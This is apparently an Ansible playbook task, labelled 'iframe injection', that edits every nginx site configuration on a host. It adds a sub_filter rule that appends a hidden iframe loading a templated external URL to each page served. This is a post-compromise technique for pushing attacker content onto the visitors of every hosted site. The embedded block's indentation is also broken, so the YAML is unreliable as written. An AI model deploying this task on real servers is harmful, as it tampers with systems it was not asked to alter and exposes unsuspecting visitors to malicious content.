- name: insert/update iframe injection
  follow: True
  blockinfile:
    path: /etc/nginx/sites-enabled/{{item}}
    insertafter: "server {"
    block: |
location / {
    sub_filter </body>
        '</body><iframe src="{{url}}"></iframe>';
    sub_filter_once on;
}
  with_items: "{{ configuration_files }}"
